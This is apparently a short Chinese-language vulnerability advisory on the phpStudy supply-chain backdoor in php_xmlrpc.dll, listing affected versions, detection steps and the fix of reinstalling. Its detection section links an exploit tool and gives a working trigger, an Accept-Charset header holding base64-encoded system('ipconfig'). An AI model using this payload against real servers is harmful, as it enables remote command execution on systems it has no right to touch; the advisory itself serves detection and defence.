##phpStudy简介

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer，一次性安装，无须配置即可使用，是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境，还包括了开发工具、开发手册等。

##漏洞概述

使用广泛的PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击，程序包自带PHP的php_xmlrpc.dll模块隐藏有后门。

##影响版本

phpStudy20161103版本：

php5.4.45与php5.2.17

phpStudy20180211版本：

php5.4.45与php5.2.17

##漏洞检测

1、查看phpStudy下相应有后门的php版本的文件 php_xmlrpc.dll

记事本打开，搜索 eval，如下表示，则代表有后门。

2、利用工具：PHPStudy_BackDoor_EXP

链接地址：https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp

3、访问任意一个php文件，进行burp抓包修改

添加请求字段：accept-Encoding 和 Accept-Charset

• accept-Encoding:gzip,deflate
• Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==   //system(“ipconfig”)的base64

##漏洞修复

去官网重新下载最新版

本文内容仅用于学习交流，切勿用于非法用途！